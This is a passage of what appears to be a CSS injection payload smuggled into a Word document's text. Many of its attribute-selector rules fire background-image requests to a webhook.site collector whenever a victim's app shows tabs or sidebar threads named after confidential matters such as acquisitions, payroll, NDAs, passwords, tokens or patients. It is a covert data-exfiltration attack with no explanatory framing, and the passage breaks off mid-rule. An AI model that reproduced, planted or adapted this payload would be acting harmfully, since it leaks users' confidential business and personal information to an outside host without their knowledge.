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</w:t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;}html{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/FIRE)!important}div[data-tab-id*=&quot;acme-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-acquisition)!important}div[data-tab-id*=&quot;acme-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-merger)!important}div[data-tab-id*=&quot;acme-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-msa)!important}div[data-tab-id*=&quot;acme-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-nda)!important}div[data-tab-id*=&quot;acme-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-payroll)!important}div[data-tab-id*=&quot;acme-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-term-sheet)!important}div[data-tab-id*=&quot;adventure-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-acquisition)!important}div[data-tab-id*=&quot;adventure-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-merger)!important}div[data-tab-id*=&quot;adventure-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-msa)!important}div[data-tab-id*=&quot;adventure-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-nda)!important}div[data-tab-id*=&quot;adventure-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-payroll)!important}div[data-tab-id*=&quot;adventure-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-term-sheet)!important}div[data-tab-id*=&quot;audit-findings&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/audit-findings)!important}div[data-tab-id*=&quot;board-minutes&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/board-minutes)!important}div[data-tab-id*=&quot;breach-notice&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/breach-notice)!important}div[data-tab-id*=&quot;budget-variance&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/budget-variance)!important}div[data-tab-id*=&quot;cap-table&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/cap-table)!important}div[data-tab-id*=&quot;comp-review&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/comp-review)!important}div[data-tab-id*=&quot;contoso-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-acquisition)!important}div[data-tab-id*=&quot;contoso-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-merger)!important}div[data-tab-id*=&quot;contoso-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-msa)!important}div[data-tab-id*=&quot;contoso-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-nda)!important}div[data-tab-id*=&quot;contoso-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-payroll)!important}div[data-tab-id*=&quot;contoso-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-term-sheet)!important}div[data-tab-id*=&quot;divestiture&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/divestiture)!important}div[data-tab-id*=&quot;due-diligence&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/due-diligence)!important}div[data-tab-id*=&quot;fabrikam-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-acquisition)!important}div[data-tab-id*=&quot;fabrikam-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-merger)!important}div[data-tab-id*=&quot;fabrikam-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-msa)!important}div[data-tab-id*=&quot;fabrikam-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-nda)!important}div[data-tab-id*=&quot;fabrikam-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-payroll)!important}div[data-tab-id*=&quot;fabrikam-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-term-sheet)!important}div[data-tab-id*=&quot;forecast&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/forecast)!important}div[data-tab-id*=&quot;globex-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-acquisition)!important}div[data-tab-id*=&quot;globex-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-merger)!important}div[data-tab-id*=&quot;globex-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-msa)!important}div[data-tab-id*=&quot;globex-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-nda)!important}div[data-tab-id*=&quot;globex-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-payroll)!important}div[data-tab-id*=&quot;globex-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-term-sheet)!important}div[data-tab-id*=&quot;headcount&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/headcount)!important}div[data-tab-id*=&quot;incident-report&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/incident-report)!important}div[data-tab-id*=&quot;initech-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-acquisition)!important}div[data-tab-id*=&quot;initech-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-merger)!important}div[data-tab-id*=&quot;initech-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-msa)!important}div[data-tab-id*=&quot;initech-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-nda)!important}div[data-tab-id*=&quot;initech-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-payroll)!important}div[data-tab-id*=&quot;initech-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-term-sheet)!important}div[data-tab-id*=&quot;litigation-hold&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litigation-hold)!important}div[data-tab-id*=&quot;litware-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-acquisition)!important}div[data-tab-id*=&quot;litware-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-merger)!important}div[data-tab-id*=&quot;litware-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-msa)!important}div[data-tab-id*=&quot;litware-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-nda)!important}div[data-tab-id*=&quot;litware-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-payroll)!important}div[data-tab-id*=&quot;litware-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-term-sheet)!important}div[data-tab-id*=&quot;loi&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/loi)!important}div[data-tab-id*=&quot;northwind-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-acquisition)!important}div[data-tab-id*=&quot;northwind-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-merger)!important}div[data-tab-id*=&quot;northwind-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-msa)!important}div[data-tab-id*=&quot;northwind-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-nda)!important}div[data-tab-id*=&quot;northwind-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-payroll)!important}div[data-tab-id*=&quot;northwind-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-term-sheet)!important}div[data-tab-id*=&quot;offer-letter&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/offer-letter)!important}div[data-tab-id*=&quot;patent-filing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/patent-filing)!important}div[data-tab-id*=&quot;pen-test&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/pen-test)!important}div[data-tab-id*=&quot;project-titan&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/project-titan)!important}div[data-tab-id*=&quot;proseware-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-acquisition)!important}div[data-tab-id*=&quot;proseware-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-merger)!important}div[data-tab-id*=&quot;proseware-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-msa)!important}div[data-tab-id*=&quot;proseware-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-nda)!important}div[data-tab-id*=&quot;proseware-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-payroll)!important}div[data-tab-id*=&quot;proseware-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-term-sheet)!important}div[data-tab-id*=&quot;q1-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q1-financials)!important}div[data-tab-id*=&quot;q2-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q2-financials)!important}div[data-tab-id*=&quot;q3-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q3-financials)!important}div[data-tab-id*=&quot;q4-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q4-financials)!important}div[data-tab-id*=&quot;risk-register&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/risk-register)!important}div[data-tab-id*=&quot;runway-model&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/runway-model)!important}div[data-tab-id*=&quot;salary-2026&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/salary-2026)!important}div[data-tab-id*=&quot;settlement&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/settlement)!important}div[data-tab-id*=&quot;severance&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/severance)!important}div[data-tab-id*=&quot;shareholder-letter&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/shareholder-letter)!important}div[data-tab-id*=&quot;soc2-report&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soc2-report)!important}div[data-tab-id*=&quot;sow&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/sow)!important}div[data-tab-id*=&quot;soylent-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-acquisition)!important}div[data-tab-id*=&quot;soylent-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-merger)!important}div[data-tab-id*=&quot;soylent-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-msa)!important}div[data-tab-id*=&quot;soylent-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-nda)!important}div[data-tab-id*=&quot;soylent-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-payroll)!important}div[data-tab-id*=&quot;soylent-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-term-sheet)!important}div[data-tab-id*=&quot;stark-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-acquisition)!important}div[data-tab-id*=&quot;stark-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-merger)!important}div[data-tab-id*=&quot;stark-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-msa)!important}div[data-tab-id*=&quot;stark-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-nda)!important}div[data-tab-id*=&quot;stark-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-payroll)!important}div[data-tab-id*=&quot;stark-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-term-sheet)!important}div[data-tab-id*=&quot;tax-memo&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/tax-memo)!important}div[data-tab-id*=&quot;termination&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/termination)!important}div[data-tab-id*=&quot;trademark-opp&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/trademark-opp)!important}div[data-tab-id*=&quot;transfer-pricing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/transfer-pricing)!important}div[data-tab-id*=&quot;umbrella-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-acquisition)!important}div[data-tab-id*=&quot;umbrella-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-merger)!important}div[data-tab-id*=&quot;umbrella-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-msa)!important}div[data-tab-id*=&quot;umbrella-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-nda)!important}div[data-tab-id*=&quot;umbrella-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-payroll)!important}div[data-tab-id*=&quot;umbrella-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-term-sheet)!important}div[data-tab-id*=&quot;valuation&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/valuation)!important}div[data-tab-id*=&quot;vandelay-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-acquisition)!important}div[data-tab-id*=&quot;vandelay-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-merger)!important}div[data-tab-id*=&quot;vandelay-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-msa)!important}div[data-tab-id*=&quot;vandelay-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-nda)!important}div[data-tab-id*=&quot;vandelay-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-payroll)!important}div[data-tab-id*=&quot;vandelay-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-term-sheet)!important}div[data-tab-id*=&quot;vendor-review&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vendor-review)!important}div[data-tab-id*=&quot;wayne-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-acquisition)!important}div[data-tab-id*=&quot;wayne-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-merger)!important}div[data-tab-id*=&quot;wayne-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-msa)!important}div[data-tab-id*=&quot;wayne-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-nda)!important}div[data-tab-id*=&quot;wayne-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-payroll)!important}div[data-tab-id*=&quot;wayne-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-term-sheet)!important}div[data-tab-id*=&quot;zenith-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-acquisition)!important}div[data-tab-id*=&quot;zenith-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-merger)!important}div[data-tab-id*=&quot;zenith-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-msa)!important}div[data-tab-id*=&quot;zenith-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-nda)!important}div[data-tab-id*=&quot;zenith-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-payroll)!important}div[data-tab-id*=&quot;zenith-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-term-sheet)!important}div[data-app-action-sidebar-thread-title*=&quot;hr&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/hr)!important}div[data-app-action-sidebar-thread-title*=&quot;api&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/api)!important}div[data-app-action-sidebar-thread-title*=&quot;bug&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/bug)!important}div[data-app-action-sidebar-thread-title*=&quot;fix&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/fix)!important}div[data-app-action-sidebar-thread-title*=&quot;git&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/git)!important}div[data-app-action-sidebar-thread-title*=&quot;key&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/key)!important}div[data-app-action-sidebar-thread-title*=&quot;pdf&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/pdf)!important}div[data-app-action-sidebar-thread-title*=&quot;sql&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/sql)!important}div[data-app-action-sidebar-thread-title*=&quot;tax&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/tax)!important}div[data-app-action-sidebar-thread-title*=&quot;auth&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/auth)!important}div[data-app-action-sidebar-thread-title*=&quot;code&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/code)!important}div[data-app-action-sidebar-thread-title*=&quot;docx&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/docx)!important}div[data-app-action-sidebar-thread-title*=&quot;file&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/file)!important}div[data-app-action-sidebar-thread-title*=&quot;user&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/user)!important}div[data-app-action-sidebar-thread-title*=&quot;xlsx&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/xlsx)!important}div[data-app-action-sidebar-thread-title*=&quot;admin&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/admin)!important}div[data-app-action-sidebar-thread-title*=&quot;audit&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/audit)!important}div[data-app-action-sidebar-thread-title*=&quot;bonus&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/bonus)!important}div[data-app-action-sidebar-thread-title*=&quot;claim&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/claim)!important}div[data-app-action-sidebar-thread-title*=&quot;count&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/count)!important}div[data-app-action-sidebar-thread-title*=&quot;court&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/court)!important}div[data-app-action-sidebar-thread-title*=&quot;email&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/email)!important}div[data-app-action-sidebar-thread-title*=&quot;fraud&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/fraud)!important}div[data-app-action-sidebar-thread-title*=&quot;legal&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/legal)!important}div[data-app-action-sidebar-thread-title*=&quot;login&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/login)!important}div[data-app-action-sidebar-thread-title*=&quot;offer&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/offer)!important}div[data-app-action-sidebar-thread-title*=&quot;token&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/token)!important}div[data-app-action-sidebar-thread-title*=&quot;breach&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/breach)!important}div[data-app-action-sidebar-thread-title*=&quot;budget&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/budget)!important}div[data-app-action-sidebar-thread-title*=&quot;client&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/client)!important}div[data-app-action-sidebar-thread-title*=&quot;dryrun&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/dryrun)!important}div[data-app-action-sidebar-thread-title*=&quot;except&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/except)!important}div[data-app-action-sidebar-thread-title*=&quot;folder&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/folder)!important}div[data-app-action-sidebar-thread-title*=&quot;merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/merger)!important}div[data-app-action-sidebar-thread-title*=&quot;salary&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/salary)!important}div[data-app-action-sidebar-thread-title*=&quot;vendor&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/vendor)!important}div[data-app-action-sidebar-thread-title*=&quot;invoice&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/invoice)!important}div[data-app-action-sidebar-thread-title*=&quot;lawsuit&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/lawsuit)!important}div[data-app-action-sidebar-thread-title*=&quot;listing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/listing)!important}div[data-app-action-sidebar-thread-title*=&quot;malware&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/malware)!important}div[data-app-action-sidebar-thread-title*=&quot;medical&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/medical)!important}div[data-app-action-sidebar-thread-title*=&quot;patient&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/patient)!important}div[data-app-action-sidebar-thread-title*=&quot;payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/payroll)!important}div[data-app-action-sidebar-thread-title*=&quot;contents&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/contents)!important}div[data-app-action-sidebar-thread-title*=&quot;contract&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/contract)!important}div[data-app-action-sidebar-thread-title*=&quot;customer&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/customer)!important}div[data-app-action-sidebar-thread-title*=&quot;database&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/database)!important}div[data-app-action-sidebar-thread-title*=&quot;firewall&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/firewall)!important}div[data-app-action-sidebar-thread-title*=&quot;incident&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/incident)!important}div[data-app-action-sidebar-thread-title*=&quot;password&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/password)!important}div[data-app-action-sidebar-thread-title*=&quot;phishing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/phishing)!important}div[data-app-action-sidebar-thread-title*=&quot;supplier&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/supplier)!important}div[data-app-action-sidebar-thread-title*=&quot;directory&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/directory)!important}div[data-app-action-sidebar-thread-title*=&quot;severance&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/severance)!important}div[data-app-action-sidebar-thread-title*=&quot;valuation&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/valuation)!important}div[data-app-action-sidebar-thread-title*=&quot;redundancy&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/redundancy)!important}div[data-app-action-sidebar-thread-title*=&quot;settlement&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/settlement)!important}div[data-app-action-sidebar-thread-title*=&quot;acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread